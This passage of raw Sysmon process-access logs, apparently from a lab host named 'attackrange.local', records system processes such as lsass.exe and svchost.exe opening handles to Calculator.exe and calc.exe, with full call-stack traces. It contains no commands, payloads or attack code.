Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360999Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+33e55|C:\Windows\SYSTEM32\psmserviceexthost.dll+11fea|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360998Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-337b-6013-8402-000000001100}16566064C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+4988e|C:\Windows\system32\twinui.pcshell.dll+4b3da|C:\Windows\system32\twinui.pcshell.dll+38af2|C:\Windows\system32\twinui.pcshell.dll+6fe9c|C:\Windows\System32\shcore.dll+b0b7|C:\Windows\system32\twinui.pcshell.dll+1dc45|C:\Windows\system32\twinui.pcshell.dll+623cb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000360997Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-337a-6013-7402-000000001100}62682592C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+129de|C:\Windows\system32\activationmanager.dll+25a83|C:\Windows\system32\activationmanager.dll+9593|C:\Windows\system32\activationmanager.dll+54b7|C:\Windows\system32\activationmanager.dll+4591|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000360996Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360995Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360994Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360993Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.187{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360992Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.187{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360991Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360990Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360989Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360988Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360987Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360986Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360985Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360984Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360983Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360982Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360981Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360980Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360979Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360978Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 